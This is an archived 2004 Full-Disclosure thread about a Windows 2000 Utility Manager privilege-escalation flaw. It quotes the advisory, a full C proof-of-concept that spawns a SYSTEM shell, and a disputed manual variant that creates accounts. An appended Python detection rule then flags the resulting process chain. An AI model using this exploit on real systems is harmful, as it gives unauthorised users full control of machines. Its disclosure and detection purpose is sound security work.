Re: [Full-Disclosure] Norton AntiVirus nested file manual scan bypass.....

From: Esteban Martínez Fayó (secemf_at_yahoo.com.ar)
Date: 04/22/04

    To: <full-disclosure@lists.netsys.com>, "natch" <lists@natch.net>
    Date: Wed, 21 Apr 2004 23:19:12 -0300
    
    

    ----- Original Message -----
    From: "natch" <lists@natch.net>
    To: <full-disclosure@lists.netsys.com>
    Sent: Monday, April 19, 2004 1:49 PM
    Subject: Re: [Full-Disclosure] Norton AntiVirus nested file manual scan bypass.....

    > Nice, but the faster method is to copy \winnt\system32\cmd.exe to
    > \winnt\winhlp32.exe (can be done as a normal user), hit win+u, then f1.

    You are wrong. A normal user cannot overwrite \winnt\winhlp32.exe with the
    default NTFS file permissions of Windows 2000.

    > When the command prompt comes up it has elevated privileges. From there
    > you can run MMC.exe, open up \winnt\system32\lusrmgr.msc and create a
    > new account.
    >
    > No external program needed. The microsoft patch simply removes the
    > contextual help.
    >
    > -
    > natch
    >
    > Vivek Rathod (Application Security, Inc.) wrote:
    >
    > > Microsoft Windows Utility Manager Vulnerability
    > >
    > > April 13, 2004
    > >
    > > Risk Level: High
    > >
    > > Summary:
    > > A local elevation of privileges vulnerability exists in the Windows Utility
    > > Manager that allows any user to take complete control over the operating
    > > system.
    > >
    > > Versions Affected:
    > > All products in the Windows 2000 operating system family.
    > >
    > > Details:
    > > Microsoft Windows 2000 contains support for Accessibility options within the
    > > operating system. Accessibility support is a series of assistive technologies
    > > within Windows that allow users with disabilities to still be able to access
    > > the functions of the operating system. Accessibility support is enabled or
    > > disabled through shortcuts built into the operating system, or through the
    > > Accessibility Utility Manager. The Utility Manager is an accessibility utility
    > > that allows users to check the status of Accessibility programs (Magnifier,
    > > Narrator, On-Screen Keyboard) and start or stop them. The Utility Manager can
    > > be invoked by pressing Windows Key + U or executing "utilman.exe /start" from
    > > the command line. The Utility Manager Service is enabled by default and runs
    > > in the interactive desktop with Local System privileges.
    > >
    > > The Utility Manager has support for context sensitive help. Users can access
    > > this by clicking on the "?" in the title bar and then on an object, or by
    > > pressing the F1 key after selecting an object. In order to display the help,
    > > Utility Manager loads winhlp32.exe but does not drop System privileges.
    > > Therefore, winhlp32.exe is executed under the Local System account. While
    > > winhlp32.exe is executing it is possible to send Windows messages to it and
    > > attack it with "Shatter" style attacks.
    > >
    > > Winhlp32.exe is executed with its main window hidden but it is very trivial
    > > to make it visible. Once the window is made visible, a typical attack would
    > > involve using the "File Open" dialog to execute a program such as "cmd.exe".
    > > Since the Help window has Local System privileges, the executed program will
    > > have the same privileges.
    > >
    > > Further information is available at:
    > > http://www.appsecinc.com/resources/alerts/general/04-0001.html
    > > http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0908
    > > http://www.microsoft.com/technet/security/bulletin/ms04-011.mspx
    > >
    > > Fix:
    > >
    > > http://www.microsoft.com/downloads/details.aspx?FamilyId=0692C27E-F63A-414C-B3EB-D2342FBB6C00&displaylang=en
    > >
    > >
    > > Acknowledgments:
    > > Thanks to Cesar Cerrudo and Esteban Martinez Fayo of Application
    > > Security, Inc. (http://www.appsecinc.com) and to
    > > Brett Moore of Security-Assessment.com (http://security-assessment.com).
    > >
    > > Please find the proof-of-concept exploit code attached
    > >
    > > ___________________________________________
    > > AppSecInc Team SHATTER
    > > Tel: 1-866-927-7732
    > > E-mail: shatter@appsecinc.com
    > > Web: www.appsecinc.com
    > >
    > > Application Security, Inc.
    > > "Securing Business by Securing Enterprise Applications"
    > >
    > > ------------------------------------------------------------------------
    > >
    > > // By Cesar Cerrudo (cesar@appsecinc.com)
    > > // Local elevation of privileges exploit for Windows Utility Manager
    > > // Gives you a shell with system privileges
    > > // If you have problems try changing Sleep() values.
    > >
    > > #include <stdio.h>
    > > #include <windows.h>
    > > #include <commctrl.h>
    > > #include <Winuser.h>
    > >
    > > int main(int argc, char *argv[])
    > > {
    > >     HWND lHandle, lHandle2;
    > >     POINT point;
    > >
    > >     // file name filter typed into the Open dialog; the '?' wildcard
    > >     // leaves only cmd.exe in the dialog's list view
    > >     char sText[] = "%windir%\\system32\\cmd.ex?";
    > >
    > >     // run utility manager
    > >     system("utilman.exe /start");
    > >     Sleep(500);
    > >
    > >     // execute contextual help (winhlp32.exe comes up with the service's token)
    > >     SendMessage(FindWindow(NULL, "Utility manager"), 0x4D, 0, 0);
    > >     Sleep(500);
    > >
    > >     // open the File Open dialog window in Windows Help
    > >     PostMessage(FindWindow(NULL, "Windows Help"), WM_COMMAND, 0x44D, 0);
    > >     Sleep(500);
    > >
    > >     // find open file dialog window
    > >     lHandle = FindWindow("#32770", "Open");
    > >
    > >     // get input box handle
    > >     lHandle2 = GetDlgItem(lHandle, 0x47C);
    > >     Sleep(500);
    > >
    > >     // set text to filter listview to display only cmd.exe
    > >     SendMessage(lHandle2, WM_SETTEXT, 0, (LPARAM)sText);
    > >     Sleep(800);
    > >
    > >     // send return
    > >     SendMessage(lHandle2, WM_IME_KEYDOWN, VK_RETURN, 0);
    > >
    > >     // get navigation bar handle
    > >     lHandle2 = GetDlgItem(lHandle, 0x4A0);
    > >     // send tab
    > >     SendMessage(lHandle2, WM_IME_KEYDOWN, VK_TAB, 0);
    > >     Sleep(500);
    > >     lHandle2 = FindWindowEx(lHandle, NULL, "SHELLDLL_DefView", NULL);
    > >     // get list view handle
    > >     lHandle2 = GetDlgItem(lHandle2, 0x1);
    > >
    > >     // type "cmd" into the list view to select the filtered entry
    > >     SendMessage(lHandle2, WM_IME_KEYDOWN, 0x43, 0); // send "c" char
    > >     SendMessage(lHandle2, WM_IME_KEYDOWN, 0x4D, 0); // send "m" char
    > >     SendMessage(lHandle2, WM_IME_KEYDOWN, 0x44, 0); // send "d" char
    > >     Sleep(500);
    > >
    > >     // popup context menu
    > >     PostMessage(lHandle2, WM_CONTEXTMENU, 0, 0);
    > >     Sleep(1000);
    > >
    > >     // get context menu handle
    > >     point.x = 10;
    > >     point.y = 30;
    > >     lHandle2 = WindowFromPoint(point);
    > >
    > >     SendMessage(lHandle2, WM_KEYDOWN, VK_DOWN, 0);   // move down in menu
    > >     SendMessage(lHandle2, WM_KEYDOWN, VK_DOWN, 0);   // move down in menu
    > >     SendMessage(lHandle2, WM_KEYDOWN, VK_RETURN, 0); // send return
    > >
    > >     SendMessage(lHandle, WM_CLOSE, 0, 0); // close open file dialog window
    > >
    > >     return 0;
    > > }
    > >
    > >
    > >
    > >
    > >
    >
    > _______________________________________________
    > Full-Disclosure - We believe in it.
    > Charter: http://lists.netsys.com/full-disclosure-charter.html

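The chain the advisory describes (utilman.exe, started as Local System on the interactive desktop, launches winhlp32.exe without dropping privileges, and the help viewer's Open dialog is then driven into spawning cmd.exe and mmc.exe) leaves a distinctive parent/child trail that a host-based detection can key on. The block below is an added example written for this page, not code from the advisory, from AppSecInc or from either poster. Everything in it is assumed for illustration: the CSV field layout and the sample process-creation records are constructed (modelled loosely on a Sysmon "Process Create" event, which did not exist in 2004), and the rule names, severities and thresholds are the editor's choices.

```python
import csv
import io
from dataclasses import dataclass
from typing import Dict, List

# Accounts under which the Utility Manager service and its children run.
SYSTEM_ACCOUNTS = {"nt authority\\system", "system"}
# Image that launches the help viewer (from the advisory).
TRIGGER_IMAGE = "utilman.exe"
# Help viewer that inherits the service's token (from the advisory).
HELP_VIEWER_IMAGES = {"winhlp32.exe"}

# Constructed sample process-creation records, not real logs. Rows 1-4 replay the
# advisory's chain; rows 5-7 are a normal user opening Help and a shell from
# Explorer and must not alert. 'session' is the Windows logon session id.
SAMPLE_EVENTS = r"""ts,pid,ppid,image,cmdline,user,session
2004-04-21T23:00:01,412,200,C:\WINNT\system32\utilman.exe,utilman.exe /start,NT AUTHORITY\SYSTEM,0
2004-04-21T23:00:02,640,412,C:\WINNT\winhlp32.exe,winhlp32.exe,NT AUTHORITY\SYSTEM,0
2004-04-21T23:00:03,812,640,C:\WINNT\system32\cmd.exe,cmd.exe,NT AUTHORITY\SYSTEM,0
2004-04-21T23:00:05,900,812,C:\WINNT\system32\mmc.exe,mmc.exe C:\WINNT\system32\lusrmgr.msc,NT AUTHORITY\SYSTEM,0
2004-04-21T23:01:00,1000,980,C:\WINNT\explorer.exe,explorer.exe,CORP\alice,0
2004-04-21T23:01:10,1100,1000,C:\WINNT\winhlp32.exe,winhlp32.exe notepad.hlp,CORP\alice,0
2004-04-21T23:01:20,1200,1000,C:\WINNT\system32\cmd.exe,cmd.exe,CORP\alice,0
"""


@dataclass
class ProcEvent:
    ts: str
    pid: int
    ppid: int
    image: str
    cmdline: str
    user: str
    session: int


@dataclass
class Alert:
    severity: str
    pid: int
    chain: str   # oldest ancestor first, e.g. "utilman.exe > winhlp32.exe > cmd.exe"
    reason: str


def parse_events(text: str) -> List[ProcEvent]:
    """Parse the constructed CSV form above into ProcEvent records."""
    out = []
    for r in csv.DictReader(io.StringIO(text)):
        out.append(ProcEvent(r["ts"], int(r["pid"]), int(r["ppid"]), r["image"],
                             r["cmdline"], r["user"], int(r["session"])))
    return out


def image_name(path: str) -> str:
    """Lower-cased file name of an image path ('C:\\WINNT\\winhlp32.exe' -> 'winhlp32.exe')."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def is_system(user: str) -> bool:
    return user.lower() in SYSTEM_ACCOUNTS


def ancestors(ev: ProcEvent, by_pid: Dict[int, ProcEvent]) -> List[ProcEvent]:
    """Parent chain of ev, nearest parent first, as far as the event set reaches.
    The 'seen' set stops a pid-reuse cycle from looping forever."""
    chain, seen = [], set()
    cur = by_pid.get(ev.ppid)
    while cur is not None and cur.pid not in seen:
        seen.add(cur.pid)
        chain.append(cur)
        cur = by_pid.get(cur.ppid)
    return chain


def detect(events: List[ProcEvent]) -> List[Alert]:
    """Flag SYSTEM-token processes created through the Utility Manager help path."""
    by_pid = {e.pid: e for e in events}
    alerts = []
    for ev in events:
        if not is_system(ev.user):
            continue  # a user's own winhlp32.exe or cmd.exe is normal
        name = image_name(ev.image)
        parents = [image_name(p.image) for p in ancestors(ev, by_pid)]
        chain = " > ".join(list(reversed(parents)) + [name])
        if name in HELP_VIEWER_IMAGES and parents[:1] == [TRIGGER_IMAGE]:
            alerts.append(Alert("medium", ev.pid, chain,
                                "help viewer started by Utility Manager with the "
                                "service's Local System token (shatter precondition)"))
        elif (name not in HELP_VIEWER_IMAGES and name != TRIGGER_IMAGE
              and any(p in HELP_VIEWER_IMAGES for p in parents)):
            alerts.append(Alert("high", ev.pid, chain,
                                "process spawned beneath the Local System help viewer"))
    return alerts


if __name__ == "__main__":
    for a in detect(parse_events(SAMPLE_EVENTS)):
        print(f"[{a.severity}] pid {a.pid}: {a.chain} -- {a.reason}")
```

Run against the constructed records it raises one medium alert for winhlp32.exe under utilman.exe and two high alerts for the cmd.exe and mmc.exe beneath it, and stays quiet for alice's Help and shell. The rule keys on the token (Local System) plus the parent chain rather than on winhlp32.exe alone, because the help viewer is launched constantly by ordinary users; and since the parent map only covers events inside the collection window, a chain whose ancestor was created before the window starts is reported truncated rather than missed.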

